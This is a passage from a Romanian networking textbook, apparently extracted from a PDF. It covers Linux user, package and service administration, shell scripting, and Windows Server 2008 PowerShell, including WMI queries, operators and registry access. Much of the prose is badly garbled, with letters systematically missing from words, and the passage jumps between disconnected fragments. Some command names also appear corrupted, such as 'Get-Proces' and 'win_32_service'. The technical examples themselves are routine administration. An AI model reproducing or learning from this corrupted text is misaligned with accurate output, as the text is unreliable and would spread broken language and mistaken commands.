Documente Academic
Documente Profesional
Documente Cultură
1
0.1 Ce este un sistem de operare? ....................................................................................... 1
0.1.1 Ce î sea ă ad i ist a ea u ui siste de ope a e?............................................... 2
0.2 Noţiu i de ază pe t u ad i ist a ea u ui siste de ope a e Li u ............................ 2
0.2.1 Co po e tele u ui siste GNU/Li u . Dist i uţii ................................................... 3
0.2.2 “iste ul de fișie e ..................................................................................................... 3
0.2.3 Gestiunea utilizatorilor .............................................................................................. 4
0.2.4 D eptu i pe siste ul de fișie e .................................................................................. 5
0.2.5 Gestiunea pachetelor ................................................................................................ 6
0.2.6 Gestiunea pachetelor DEB......................................................................................... 7
0.2.7 Gestiunea serviciilor .................................................................................................. 8
0.2.8 Shell scripting ............................................................................................................ 9
0.3 Introducere în Microsoft Windows Server 2008 .......................................................... 12
0.3.1 Despre Microsoft Windows Server 2008 ................................................................. 12
0.3.2 Windows PowerShell ............................................................................................... 13
1 Nivelul fizic............................................................................................................................ 32
1.1 Semnale ........................................................................................................................ 32
1.1.1 Tipuri de semnale .................................................................................................... 32
1.1.2 Codarea ................................................................................................................... 34
1.1.3 Modularea ............................................................................................................... 36
1.1.4 Multiplexarea .......................................................................................................... 37
1.1.5 Caracteristici ale semnalului ................................................................................... 38
1.2 Soluţii de comunicaţie pe cupru ................................................................................... 41
1.2.1 Cablul coaxial........................................................................................................... 41
1.2.2 Cablul torsadat ........................................................................................................ 41
1.3 Soluţii de comunicaţie pe fi ă opti ă .......................................................................... 46
1.3.1 multi-mode .............................................................................................................. 48
1.3.2 single-mode ............................................................................................................. 48
1.3.3 Comparaţie între single- ode şi ulti-mode ......................................................... 48
1.3.4 Mod de construcţie, conectori ................................................................................ 49
1.3.5 Multiple a ea p i di iza ea lu gi ii de u dă – WDM .......................................... 52
1.3.6 Comparaţie între fibra optică şi a lul UTP ............................................................. 53
1.4 Caracteristici ale mediilor de transmisie ...................................................................... 54
1.4.1 Frecvenţa ................................................................................................................. 54
1.4.2 Lăţi ea de a dă .................................................................................................... 54
1.4.3 Unităţi de ăsu ă .................................................................................................... 54
1.4.4 Baseband şi broadband ........................................................................................... 55
1.5 Echipamente de reţea de nivel fizic ............................................................................. 56
1.5.1 Repetorul ................................................................................................................. 56
1.5.2 Convertorul ............................................................................................................. 58
1.6 Studii de caz .................................................................................................................. 58
1.6.1 Realizarea patch-urilor UTP straight-through, crossover, rollover ......................... 58
2 ‘eţele Ethe et..................................................................................................................... 60
2.1 Noţiu i ge e ale ........................................................................................................... 60
2.1.1 Structura cadrului Ethernet..................................................................................... 61
2.1.2 CSMA/CD ................................................................................................................. 62
2.1.3 Full-duplex Ethernet ................................................................................................ 64
2.2 Ethernet switching ....................................................................................................... 65
2.2.1 Î ăţa ea ad eselo ................................................................................................. 66
2.2.2 Deciziile de comutare .............................................................................................. 67
2.2.3 Evitarea buclelor de nivel doi – STP ........................................................................ 68
2.2.4 Metode de comutare .............................................................................................. 73
2.2.5 Switch vs. Bridge ..................................................................................................... 74
ii | ‘ e ţ e l e L o a l e
Cine este...
Linus Torvalds este programator fi la dez, u os ut el ai i e a a hite tul şef al
nuceulului Linux (BDFL – Be e ole t Di tato Fo Life . După e a p i it o opie a
sistemului MINIX, a început lucrul la scrierea Linux pentru i386. S-a mutat in Statele Unite
u de susţi e iş a ea Ope Software prin intermediul Linux Foundation. Este angajat al
Ope “ou e De elop e t La s. Dez oltă î o ti ua e ke elul Li u î ad ul o u ităţii
Linux.
Alan Cox este un programator britanic implicat în dezvoltarea nucleul Linux. În timp ce
era angajat la U i e sitatea “ a sea di Ţa a Galilo a i stalat o dist i uţie de Li u î t -o
eţea i te s folosită. A î eput să ezol e u e oase ug-u i şi a es is ap oape i teg al
pa tea de eţea di ke el. A î t eţi ut e siu ea . de Li u , apoi a dez oltat propria
e siu e . . A fost pe t u o ultă e e o side at î ad ul o u ităţii Li u se u dul
lui Li us To alds. Este u pute i susţi ăto î ăit p og a elo f ee/ope -source.
David Miller este un dezvoltator al nucleului Linux implicat la partea de et o ki g şi
SPARC. A portat Linux pe arhitectura Sun Microsystem SPARC, argumentând de ce Linux
e ge ai i e de ât “ola is. Este dez olato ul sti ei TCP/IP di Li u și u ul di p i ipalii
o t i uito i la î u ătăţi ea pe fo aţelo Li u î eţelele cu trafic intens.
Dave Cutler este desig e şi de oltato al siste elo de ope a e de la DEC R“X-11M,
VM“, VAXELN şi de la Mi osoft Wi do s NT . “-a mutat de la DEC la Microsoft pentru a
conduce dezvoltarea Windows NT concentrându-se pe implementarea sistemului de
ope a e pe p o eso ul pe iţi Alpha de la DEC. Dupa dispa iţia DEC, a lu at la po ta ea
Windows pe AMD 64.
apli aţii
user space
apli aţii de ază
nucleu
kernel space
pachetelor de programe, gestiu ea se i iilo , asigu a ea se u ităţii siste ului, auto atiza ea
sarcinilor.
A eastă a te se a efe i u p edile ţie la gestiu ea se i iilo . Vo fi p eze tate și
i fo aţii utile desp e alte o po e te e esa e.
Majo itatea i te a ţiu ii ad i istratorului de sistem cu sistemul de operare Linux se va
ealiza p i i te ediul i te feţei î li ia de o a dă shell și a fișie elo de o figu a e te t
(cu ajutorul unui editor). Se vor considera a ope ite u oști ţele de ază desp e utiliza ea
interfeţei î li ia de o a dă și edita ea fișie elo de o figu a e.
Director Descriere
/ ‘ădă i a siste ului de fișie e
/bin/ Executabile (binare) asociate comenzilor importante
/dev/ Dispozitive (/dev/null, /dev/hda, /dev/random)
/etc/ Fișie e de o figu a e
1
http://www.gnu.org/
2
http://www.debian.org/doc/manuals/apt-howto/
3
http://www.pathname.com/fhs/
4|‘eţele Lo ale
Co e zile de ază pe t u i te a ţiu ea u siste ul de fișie e su t: pwd, ls, cd, touch, rm,
mkdir, rmdir, cp, mv, link, unlink.
Din motive de securitate, hash-ul aso iat pa olei u se găsește î fișie ul /etc/passwd, ci
î fişie ul /etc/shadow care nu poate fi accesat de majoritatea utilizatorilor:
anaconda:~# ls -l /etc/shadow
-rw-r----- 1 root shadow 7068 2008-09-12 11:59 /etc/shadow
Pe t u a afla i fo aţii desp e u utilizato al siste ului se pot folosi o zile id sau
finger:
anaconda:~# id andreir
uid=1114(andreir) gid=1026(students) groups=1026(students),1037(rl)
anaconda:~# finger alexn
Login: alexn Name: Alex Negrea
Directory: /home/students/alexn Shell: /bin/bash
Never logged in.
No mail.
No Plan.
Utilizatorul privilegiat într-un sistem Unix este utilizatorul root cu uid-ul și home-ul în
/root:
anaconda:~# head -1 /etc/passwd
root:x:0:0:root:/root:/bin/bash
Utilizatorul root (de fapt utilizatorul cu uid-ul 0) are drepturi absolute în cadrul sistemului
și poate ula o i e o a dă. “e e o a dă folosi ea u ui o t ep i ilegiat. Doar atunci când
este nevoie se va folosi contul privilegiat.
“ hi a ea u ui utilizato se ealizează u ajuto ul o e zii su u ată de i t odu e ea
pa olei pe t u a el utilizato . Da ă utilizato ul i iţial este root, u se soli ită i t odu e ea
parolei:
anaconda:~# head -1 /etc/passwd
5|Cuprins
root:x:0:0:root:/root:/bin/bash
anaconda:~# su - andreir
andreir@anaconda:~$ su - razvan
Password:
A a tajul și, î a elași ti p, deza a tajul folosi ii o e zii adduser este interactivitatea.
Automatizarea sarcinilor presupune comenzi non-interactive. Pentru aceasta, se pot folosi
comenzile useradd, userdel și usermod. useradd, respectiv userdel sunt folosite de
scripturile adduser și deluser.
anaconda:~# useradd -m -d /home/test test
anaconda:~# id test
uid=1116(test) gid=1116(test) groups=1116(test)
anaconda:~# usermod -s /bin/sh test
anaconda:~# userdel -r test
anaconda:~# id test
id: test: No such user
anaconda:~# ls -l /etc/services
-rw-r--r-- 1 root root 18274 2007-02-02 04:09 /etc/services
anaconda:~# ls -l /var/mail/razvan
-rw-rw---- 1 razvan mail 0 2007-06-19 16:54 /var/mail/razvan
Majo itatea dist i uţiilo GNU/Li u foloses oţiu ea de depozit de pa hete repository).
A esta este u U‘L a e p e izează lo aţia di e selo pa hete ale dist i uţiei. A este depozite
su t p e izate î fișie e de o figu a e spe ifi e dist i uţiei. Apli aţii front-end peste PMS pot
i te oga depozitele și pot des ă a și i stala oi pachete.
Î lu ea Li u e istă di e se fo ate de pa hete, ele ai u os ute fii d fo atul DEB,
spe ifi dist i uţiilo De ia - ased și fo atul ‘PM folosit de Fedo a/‘edHat, Ma d i a, “u“E,
etc. Fiecare format are propriul PMS. Utilitarul alien1 permite conversia între diverse formate
de pachete.
ăuta ea de pa hete:
anaconda:/tmp# apt-cache search hevea
hevea - translates from LaTeX to HTML, info, or text
lyx - High Level Word Processor
hevea-doc - HeVeA documentation
1
http://kitenet.net/~joey/code/alien/
8|‘eţele Lo ale
Î plus faţă de apt, dpkg ofe ă opţiu i pe t u i te oga ea stă ii a tuale a pa hetelo sau a
o ţi utul a esto a. P i t e opţiu ile utile se u ă ă:
lista ea o ţi utului u ui pa het:
anaconda:/tmp# dpkg -L coreutils
/.
/bin
/bin/mkdir
/bin/mv
/bin/true
/bin/mknod
/bin/sleep
/bin/touch
/bin/chgrp
/bin/uname
/bin/echo
/bin/sync
[...]
efi ie ţa a ti ităţilo efe tuate. U ad i ist ato poate e u ge și la alte limbaj de scripting
precum Perl sau Python dar shell scripting-ul ofe ă posi ilitatea de a folosi o e zi deja
implementate.
Fă ă a-și p opu e să p ezi te e hausti oţiu ile legate de shell scripting, a eastă se ţiu e
ofe ă o t e e e î e istă a aspectelor importante.
exit 0
Rularea acestui script se poate realiza prin transmiterea ca argument interpretorului sau
p i ula ea a estuia a u e e uta il da ă a e d ept de e e uţie :
razvan@anaconda:/tmp$ bash hw.bash
Hello, World
razvan@anaconda:/tmp$ ls -l hw.bash
-rw-r--r-- 1 razvan razvan 41 Sep 13 14:45 hw.bash
razvan@anaconda:/tmp$ chmod a+x hw.bash
razvan@anaconda:/tmp$ ./hw.bash
Hello, World
Î lă ţui ea o e zilo se efe ă la folosi ea ope ato ului | pipe pe t u a t i ite ieși ea
unei comenzi la intrarea alteia:
razvan@valhalla:~$ last -10 | cut -d ' ' -f 1 | sort -u
razvan
reboot
wtmp
0.2.8.3 Variabile
În programarea shell, a și ulte alte li aje de scripting o a ia ilă u a e u tip și poate
fi o side ată, î fu ţie de e oie, și sau u ă . Câte a e e ple de i iţializare de variabile
sunt enumerate mai jos:
var1=5
my_home_dir=/home/users/alpha
list=”a b c d e”
Referirea unei variabile se realizează prin prefixarea numelui acesteia cu $.
razvan@valhalla:~$ echo $a
5
razvan@valhalla:~$ b="a are valoarea $a"
razvan@valhalla:~$ echo $b
a are valoarea 5
11 | C u p r i n s
Cele ai folosite i st u ţiu i de i la e su t for și while. Mai jos sunt prezentate câteva
exemple de folosire a acestora:
razvan@anaconda:/tmp$ for i in $(seq 1 10); do echo $i; done
1
2
3
4
5
6
7
8
9
10
razvan@anaconda:/tmp$ for i in "a b c"; do touch $i; done
razvan@anaconda:/tmp$ ls -l a b c
-rw-r--r-- 1 razvan razvan 0 Sep 13 14:51 a
-rw-r--r-- 1 razvan razvan 0 Sep 13 14:51 b
-rw-r--r-- 1 razvan razvan 0 Sep 13 14:51 c
razvan@anaconda:/tmp$ i=1; while test $i -le 5; do echo $i; ((i++)); done
1
2
3
4
5
iulian:Iulian Moraru,,,
max:Maximilian Machedon,,,
cosmin:Cosmin Ratiu,,,
adrian:Adrian Nistor,,,
cristina:Cristina Carbunaru,,,
amihaiuc:Alex Mihaiuc,,,
Î se sul său de ază, u „server t e uie să ofe e se i ii u o utilizato i sau alto servere,
o i, a î azul el ai des i tâl it î lu ea eală, o o i aţie a elo două. Î te e i
teh i i, se e ul ep ezi tă, de fapt, siste ul de ope a e al aşi ii e î depli eşte olul de
se e , î p eu ă u apli atiile pe a e a esta le susţi e şi le foloseşte pe t u a putea ofe i
se i iile e ţio ate a te io . E ide t, î a este o diţii, o platfo ă de tip se e a t e ui
să supo te u i el dife it de î ă a e şi u od dife it de utiliza e a esu selo sale faţă de o
platfo ă desktop/workstation. De ase e ea, u se e t e uie să poată fu ţio a o
pe ioadă î delu gată de ti p fă ă sup a eghe e şi să i ple e teze e a is e sigu e de
e upe a e î azul e o ilo sau e e i e telo ep e ăzute. Totodată, a estea t e uie
documentate într-un siste de e ţi e e a ju alelo logging) bine pus la punct pentru a
putea ofe i apid şi oe e t i fo aţii desp e e oluţia siste ului. A estea su t, de ase e ea,
aspecte prin care Windows Server 2008 se dista ţează de Vista şi, i pli it, de o i e alt siste
de operare orientat spre mediul desktop.
Pe t u toate siste ele de ope a e de ai sus este e esa ă p eze ţa Microsoft .NET
Framework el puţi la e siu ea . .
La o e tul s ie ii a estei ă ţi, e siu ea u e tă de PowerShell e poate fi des ă ată
de pe site-ul Microsoft este Windows PowerShell 2.0 CTP21 (Community Technology Preview).
Versiunea de PowerShell i lusă î Windows Server 2008 este . . Î ai tea i stală ii u ei
oi e siu i, este e esa ă dezi stala ea elei e hi folosi d Add/Remove Programs sau
Programs and Features din Control Panel.
Pe e siu ile de Wi do s pe de iţi, PowerShell se instalează i pli it î di e to ul
%SystemRoot%\System32\WindowsPowerShell\v1.0.
Pe e siu ile de Wi do s pe de iţi, a ia ta PowerShell pe de iţi se i stalează î
directorul %SystemRoot%\SystemWow64\WindowsPowerShell\v1.0 ia a ia ta pe de iţi,
a şi în cazul anterior, la %SystemRoot%\System32\WindowsPowerShell\v1.0.
1
http://www.microsoft.com/technet/scriptcenter/topics/winpsh/pshell2.mspx
15 | C u p r i n s
0.3.2.4 Co figurări
I te faţa PowerShell-ului poate fi o figu ată p i t -u set elati i i al de opţiu i
disponibile prin clic-dreapta pe bara de titlu, la opţiu ea Properties.
P i t e pa a et ii e pot fi o figu aţi se u ă ă: ă i ea buffer-ului, tipul de font folosit
şi ă i ea sa, ă i ea fe est ei şi a zo ei e poate fi de ulată, p e u şi s he a de ulo i
folosită.
Majoritatea comenzilor PowerShell sunt simple, dar pot fi folosite în diverse o i aţii.
Ele su t uso ide tifi a ile după fo atul u elo : u e şi u su sta ti sepa ate p i t -o
li iuţă -), de exemplu: Get-Process, Start-Service, Get-Help. Din formatul comenzilor se
desprind câteva categorii:
o e zile de tip „get a e etu ează date;
o e zile de tip „set a e i t odu sau odifi ă date;
o e zile de tip „out a e di e ţio ează ieşi ea sp e o desti aţie spe ifi ată;
o e zile de tip „format a e s hi ă fo atul datelo etu ate a ezultat.
Pe t u a afişa o listă o pletă a o e zilo supo tate de PowerShell se poate folosi
comanda1:
Get-Command
1
“e o se ă ă î ezultatul lui Get-Command su t etu ate doa a ele o e zi spe ifi e şi supo tate
ati de ăt e PowerShell, dar nu sunt listate toate comenzile suportate de acesta prin alias-uri sau din motive de
compatibilitate cu vechile comenzi DOS sau UNIX. Mai multe detalii î se ţiu ea 0.3.2.10.
16 | ‘ e ţ e l e L o a l e
[...]
DETAILED DESCRIPTION
[...]
PARAMETERS
[...]
Î e e plul u ăto , o a da afişează o listă u toate fişie ele de ajutor din Windows
PowerShell:
C:\PS>get-help *
Este posi ilă afişa ea doa a u ei atego ii de i fo aţii di pagi a de ajuto . Î e e plul
u ăto , se afişează doa e e plele de utilizare ale comenzii Get-Process:
Get-Help Get-Process –Examples
sau
info <nume_comanda>
0.3.2.7 Co e zi şi o ie te
Co e zile şi ezultatele di PowerShell sunt, de fapt, obiecte .NET. Conform conceptelor
de ază ale p og a ă ii o ie tate pe o ie te, u o ie t ep ezi tă o i sta ţă, o e titate e
deţi e a u ite a a te isti i des ise de p op ietăţi şi poate e e uta a u ite a ţiu i p i
intermediul metodelor.
“p e e e plu, o o a da e etu ează u se i iu in PowerShell de fapt etu ează u
o ie t e ep ezi tă se i iul. I fo aţiile desp e se i iu su t p op ietăţi ale o ie tului
etu at. Po i ea u ui se i iu se t adu e î seta ea p op ietăţii „Status pe aloa ea
„started folosi d o etodă a o iectului serviciu.
Di faptul ă fu da e tul o e zilo PowerShell îl ep ezi tă o ie tele, se dedu e faptul
ă a u ite utilita e de p o esa e azate pe te t şi apli ate pe ezultatele o e zilo
PowerShell a putea să u ai ă ezultatul aşteptat. De fapt, în cele mai multe dintre cazuri,
folosi ea utilita elo de p o esa e te t i i u este e esa ă, di o e t e datele spe ifi e
pot fi extrase din rezultatele comenzilor folosind metodele standard de manipulare a
obiectelor. Acest lucru este posibil deoarece ezultatele o e zilo î apsulează o ulţi e de
alte i fo aţii de ât ele izi ile a şi u i de a a te e pe e a .
“p e e e plu, o odalitate de a afişa i fo aţii desp e toate i te feţele de eţea di
siste , fizi e sau i tuale, o ep ezi tă u ătoa ea o a dă:
get-wmiobject Win32_NetworkAdapterConfiguration
o figu ată auto at p i DHCP sau u, u ele său, et , o ate â d a este i fo aţii pe t u
toate i te feţele. La i el de te t, da ă s-a do i doa afişa ea u elui i te feţei şi a ad esei IP
configurate pe ea, s-a folosi a eeaşi o a dă, filt â d ezultatul său şi păst â d a elaşi od
de afişa e. Î PowerShell, î să, ezultatul este u o ie t di a e se pot e t age doa
p op ietăţile do ite, a î e e plul u ăto :
get-wmiobject Win32_NetworkAdapterConfiguration | Select-Object -property IPAddress,
Description
TypeName:
System.Management.ManagementObject#root\cimv2\Win32_NetworkAdapterConfiguration
Name MemberType Definition
---- ---------- ----------
DisableIPSec Method System.Management...
EnableDHCP Method System.Management...
EnableIPSec Method System.Management...
EnableStatic Method System.Management...
ReleaseDHCPLease Method System.Management...
DefaultTOS Property System.Byte DefaultTOS {get;set;}
DefaultTTL Property System.Byte DefaultTTL {get;set;}
Description Property System.String Description {get;set;}
DHCPEnabled Property System.Boolean DHCPEnabled {get;set;}
DHCPLeaseExpires Property System.String DHCPLeaseExpires {get;set;}
DHCPLeaseObtained Property System.String DHCPLeaseObtained {get;set;}
DHCPServer Property System.String DHCPServer {get;set;}
DNSDomain Property System.String DNSDomain {get;set;}
[...]
Î u ele azu i, i t odu e ea u elo pa a et ilo este opţio ală, fii d sufi ie tă
i t odu e ea alo ii lo . “p e e e plul, fo a o pletă a o e zii Get-Help presupune
declararea numelui comenzii precedat de parametrul Name, a î e e plul de ai jos. Totuşi,
pa a et ii pot fi folosiţi fă ă a li se spe ifi a u ele da ă se espe tă u st i teţe o di ea lo
di se ţiu ea de si ta ă a pagi ii de ajuto :
Get-Help –Name Get-Host
1
U fapt i te esa t de e a at este ă la utiliza ea o e zii help, ezultatul este afişat î stilul
utilitarului more, di UNIX: tasta E te pe t u li ia u ătoa e sau “pa e pe t u e a ul u ăto .
20 | ‘ e ţ e l e L o a l e
PS C:\> Get-Proces
Handles NPM(K) PM(K) WS(K) VM(M) CPU(s) Id ProcessName
------- ------ ----- ----- ----- ------ -- -----------
243 12 247672 257788 368 435.57 7344 AcroRd32
127 14 1796 2004 39 0.22 2544 alg
65 3 2172 796 38 0.12 2008 AppleMobileDeviceService
109 3 1216 968 36 0.14 988 Ati2evxx
133 4 1956 3460 51 79.33 1952 Ati2evxx
154 6 24324 16160 71 1572 audiodg
47 2 1120 472 49 0.11 3452 brs
187 10 8288 7732 102 33.62 1828 BTStackServer
[...]
Directory: Microsoft.PowerShell.Core\FileSystem::C:\
SMBIOSBIOSVersion : A14
Manufacturer : Dell Inc.
Name : Phoenix ROM BIOS PLUS Version 1.10 A14
SerialNumber : 3YN0W2J
Version : DELL - 27d70402
PS C:\> Get-WmiObject -Class Win32_ComputerSystem
Domain : WORKGROUP
Manufacturer : Dell Inc.
Model : MM061
Name : WIN-8J4PG74KHA9
PrimaryOwnerName : Windows User
TotalPhysicalMemory : 2145083392
De ase e ea, WMI poate fi folosit şi pe t u i te a ţiu ea u p o ese sau se i ii. Lista ea
lor se face prin comenzile: Get-WmiObject win32_process, respectiv Get-WmiObject
win_32_service. Ate ţie, a este o e zi au ezultate e t e de olu i oase, di o e t
e afişează toate i fo aţiile e pot fi e t ase di o ie tele de tip p o es, espe ti se i iu. O
soluţie pe t u edu e ea a tităţii de i fo aţii afişate o ep ezi tă fie apli a ea u ui filtru, fie
1
“e o se ă apoi, la izualiza ea pagi ii HTML o ţi ute, ă î a easta au fost i luse su fo a apetelo
de tabel toate datele despre procese ce sunt returnate de comanda ps / Get-Process, mai exact, 62 de
pa a et ii spe ifi i fie ă ui p o es, î o pa aţie u ei a e su t afişaţi i pli it î o solă, eea e o fi ă
î ă o dată atu a de o ie t a ezultatelo o e zilo PowerShell.
21 | C u p r i n s
__GENUS : 2
__CLASS : Win32_OperatingSystem
[...]
__RELPATH : Win32_OperatingSystem=@
[...]
Caption : Microsoft® Windows Server® 2008 Standard
CSName : WIN-8J4PG74KHA9
FreeVirtualMemory : 2602080
TotalVirtualMemorySize : 4471252
Version : 6.0.6001
ExitCode : 1077
Name : iPod Service
ProcessId : 0
StartMode : Manual
State : Stopped
Status : OK
__GENUS : 2
__CLASS : __PARAMETERS
__SUPERCLASS :
__DYNASTY : __PARAMETERS
__RELPATH :
__PROPERTY_COUNT : 1
__DERIVATION : {}
__SERVER :
__NAMESPACE :
__PATH :
ReturnValue :
ExitCode : 0
Name : iPod Service
ProcessId : 904
StartMode : Manual
State : Running
Status : OK
ExitCode : 0
Name : Dhcp
ProcessId : 1008
StartMode : Auto
State : Running
Status : OK
0-8: O ți erea stării u ui ser i iu folosi d PowerShell şi WMI, pri tr-o o a dă “QL
1
http://e . ikipedia.o g/ iki/‘ootkit şi http:// . ootkit. o
23 | C u p r i n s
Î e e plul de ai sus, politi a a ti ă este ea de Restricted, a e este şi ea i pli ită. Valo ile
posi ile pe a e politi a de e e uţie a siste ului le poate a ea su t:
Restricted: i pli it, u a eptă e e uţia i iu ui s ipt
AllSigned: sunt acceptate sp e e e uţie doa s iptu ile se ate
RemoteSigned: este pe isă e e uţia s iptu ilo lo ale; estul t e uie se ate
Unrestricted: toate scripturile pot fi executate
0.3.2.11.3 Variabile
Co eptul de a ia ilă se î tâl eşte î ap oape o i e li aj de p og a a e sau de
scripting. Î ese ţă, ep ezi tă o zo ă de e o ie ad esa ilă p i t -un nume dat de
p og a ato a e poate să sto heze date e o fi folosite la u o e t ulte io . Î
PowerShell pot fi defi ite a ia ile, da u ele a esto a t e uie să î eapa u se ul dola
($). Numele variabilelo pot o ţi e a a te e alfa u e i e lite e şi if e şi alte âte a
si olu i. “e pot i t odu e hia şi spaţii î u ele a ia ilelo , u o diţia a u ele să fie
cuprinse între paranteze acolade {}.
U ătoa ele e e ple ep ezi tă i itializă i alide de variabile:
$name = "Nicoleta"
$pi = 3.14
${variabila cu spatii} = "atentie la paranteze!"
1
echo este un alias pentru comanda Write-Output.
24 | ‘ e ţ e l e L o a l e
Î se e ţa a te ioa ă s-a atribuit valoarea 5 variabilei $a, după a e s-a afişat î o solă
rezultatul expresiei $a + 3. După u e de aşteptat, se a afişa .
Da da ă se ia î o side a e e e plul u ăto :
$a = 7
$s = "un sir de caractere"
…cod nesemnificativ…
$a = "Nicoleta"
…în continuare, cod nesemnificativ…
write-host ($a + 7)
1
E istă şi a ia ila p edefi ită $NULL. O i e a ia ilă ei iţializată eutilizată a e o ţi utul egal u
$NULL.
2
Mai multe despre ASDI: http://msdn.microsoft.com/en-us/library/aa772170.aspx
25 | C u p r i n s
Adăuga ea de oi ele e te î t -un vector se face tot p i i te ediul ope ato ului „+ 1:
PS C:\> $vec = $vec + 23, 48
PS C:\> Write-Host $vec
4 8 15 16 23 48
F ag e tul de s ipt de ai sus e ifi ă aloa ea at i uită a ia ilei $a. Da ă a easta este
u ei a afişa „unu , da a este a afişa „doi şi pe t u o i e altă aloa ea i lusi
valori non- u e i e şi alte tipu i a afişa „diferit de unu sau doi 2.
După u se o se ă, si gu ul ele e t elati ou i t odus este ope ato ul de egalitate
folosit în interiorul if-ului: –eq. E istă o se ie de alţi ope ato i de o pa aţie e pot fi folosiţi î
PowerShell, fie a e di t e a eştia fii d des işi p i t -o ati ă - u ată de o a e ie e de
două lite e a fu ţiei u e i e pe a e a esta o î depli eşte p e u şi alte fo e pe t u
dife ite tipu i de date. Lista este u ătoa ea:
-eq Egalitate
-ne Inegalitate
-lt Mai mic
-le Mai mic sau egal
-gt Mai mare
-ge Mai mare sau egal
-contains Dete i ă apa te e ţa la u g up, etu ează î totdeau a [boolean]True sau
[boolean]False
-notcontains Dete i ă eapa te e ţa la u g up, etu ează î totdeau a
[boolean]$True sau [boolean]$False
-match Co siste ţă la o pa a ea p i e p esii egulate
-notmatch I o siste ţă la o pa a ea p i e p esii egulate
-like Co siste ţă la o pa a ea u wildcard-uri
-notlike I o siste ţă la o pa a ea u ild a d-uri
-band ŞI i a
-bor SAU binar
-bnot egaţie i a ă
-is Este de tipul (ex: $x –is [int])
-isnot Nu este de tipul (ex: $x –isnot [single])
1
În general, expresiile de tipul $x = $x + y pot fi înlocuite p i e p esia $ += , a şi î li ajul C.
2
Pa a teze a olade su t o ligato ii î toate situaţiile, hia da ă î ad ează o si gu ă i st u ţiu e.
26 | ‘ e ţ e l e L o a l e
În plus, PowerShell i ple e tează a ia tele case sensitive ale unor comenzi prezentate
mai sus (-clt, -cgt, -cle, -cge, -ceq, -cne, -clike, -cnotlike, -ccontains, -
cnotcontains, -cmatch, -cnotmatch , p e u şi o se ie de ope ato i spe iali, pe lâ gă ei
clasici, ca +, -, /, %, *, !:
-replace Înlocuire (ex: “abcde” –replace “b”, “B”)
-ireplace Înlocuire case-insensitive
-as Convertire la alt tip (ex: 123 –as [string] t atează a şi de a a te e
.. Operator de interval (ex: foreach ($i in 1..10) {$i} afişează u e ele de lala
10)
& Operator de apel (ex: $a = “Get-ChildItem” &$a va executa Get-ChildItem)
-F Operator de formatare (ex: foreach($p in Get-Process) {"{0,-15} has {1,6}
handles" –F $p.processname,$p.Handlecount} a e a efe t afişa ea liste de p o ese
în formatul <nume_proces> has <x> handles)
De ase e ea, î o st u ţiile de tip epetiţie pot fi folosite şi i st u ţiu ile break şi
continue, cu efectele binecunoscute.
1
În exemplul do..while u este a ătată aloa ea u a e este i iţializată a ia ila $a. Implicit,
valoarea acesteia este $NULL. E istă a u ite opti iză i pe t u lu ul u a eastă aloa e, a sp e e e plu $a++,
î o diţiile î a e $a este $NULL, va returna valoarea 1, dar nu este recomandabil lucrul cu variabile
ei iţializate.
28 | ‘ e ţ e l e L o a l e
Codul de ai sus o ţi e o listă a tutu o fişie elo u e te sia .txt din directorul
D:\Logs\ şi o t i ite u ui iclu foreach a e ite ează pe fie a e ele e t şi ulează o a da
move-item u doi pa a et i: p i ul a â e u ele fişie ului p i it di pipe iar al doilea
ep ezi tă tot u ele fişie ului u e t, da u e te sia .txt su stituită î .bak. Cu alte
cuvinte, co a da ede u eşte toate fişie ele te t di D:\Logs\ schimbându-le extensia .txt
în .bak.
Hive:
Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersio
n\Run
SKC VC Name Property
--- -- ---- --------
3 1 OptionalComponents {(default)}
A est lu u se î tâ plă deoa e e doa heile su t onsiderate obiecte, valorile lor fiind
t atate a p op ietăţi. Aşada , pe t u o ţi e ea alo ii u ei hei se poate folosi o a da Get-
ItemProperty, eventual cu parametrul „. , adi ă di e to ul u e t, pe t u a afişa toate
alo ile heilo di lo aţia u e tă:
PS HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run> Get-ItemProperty .
[...]
PSChildName : Run
PSDrive : HKLM
PSProvider : Microsoft.PowerShell.Core\Registry
IntelliPoint : "C:\Program Files\Microsoft IntelliPoint\ipoint.exe"
SigmatelSysTrayApp : sttray.exe
Windows Defender : C:\Program Files\Windows Defender\MSASCui.exe -hide
SynTPEnh : C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
vmware-tray : C:\Program Files\VMware\VMware Workstation\vmware-tray.exe
1
Este vorba despre cheia Run din HKEY_LOCAL_MACHINE. E epţia o ep ezi tă heia Run din
HKEY_CURRENT_USER a e spe ifi ă e e uta ilele e o fi ulate doa â d utilizato ul se aute tifi ă î
sistemul de operare.
2
http://msdn.microsoft.com
29 | C u p r i n s
În exemplele anterioare s-a lucrat direct în interiorul hive-ului HKLM. Pentru a schimba
lo aţia u e tă î u ul di t e elelalte hive-u i, este e esa ă î tâi o e ta ea la PowerShell
Registry Provider, u fel de ădă i ă a ‘egist -ului o epută spe ial pe t u PowerShell şi
de u ită REGISTRY::, a î e e plul u ăto :
PS HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run> cd registry::
PS Microsoft.PowerShell.Core\Registry::> ls
Hive:
SKC VC Name Property
--- -- ---- --------
7 0 HKEY_LOCAL_MACHINE {}
14 0 HKEY_CURRENT_USER {}
373 0 HKEY_CLASSES_ROOT {}
2 0 HKEY_CURRENT_CONFIG {}
0 2 HKEY_PERFORMANCE_DATA {Global, Costly}
6 0 HKEY_USERS {}
0-10: Hive-urile Registry-ului ăzute pri i ter ediul PowerShell Registry Provider
7:49:00 PM
1
De fapt, Get-Date etu ează deopot i ă i fo aţii legate de data şi o a u e tă. Nu e istă o
o a dă Get-Time ci doar parametri suplimentari ai lui Get-Date.
30 | ‘ e ţ e l e L o a l e
Calcularea datelor din trecut sau viitor se face tot prin metode aplicate lui Get-Date, ca în
e e plele de ai jos. “e o se ă ă s ăde ea u ităţilo de ti p se fa e p i a eleaşi etode,
dar argumente negative:
(Get-Date).AddMonths(3)
(Get-Date).AddHours(145)
(Get-Date).AddYears(-2)
<instrucţiuni>
$stop = Get-Date
$timediff = New-TimeSpan $start $stop
Write-Host “Scriptul a rulat “ + $timediff.milliseconds + " milisecunde."
Bi eî ţeles, î e e plul de ai sus se pot folosi şi zile, o e, i ute, se u de, ticks precum
şi alte p op ietăţi î lo ul ilise u delo .
Pentru a calcula prin intermediul unui TimeSpan timpul dintre momentul u e t şi o dată
oa e a e di p eze t sau t e ut, se poate folosi o o a dă u si ta a u ătoa e:
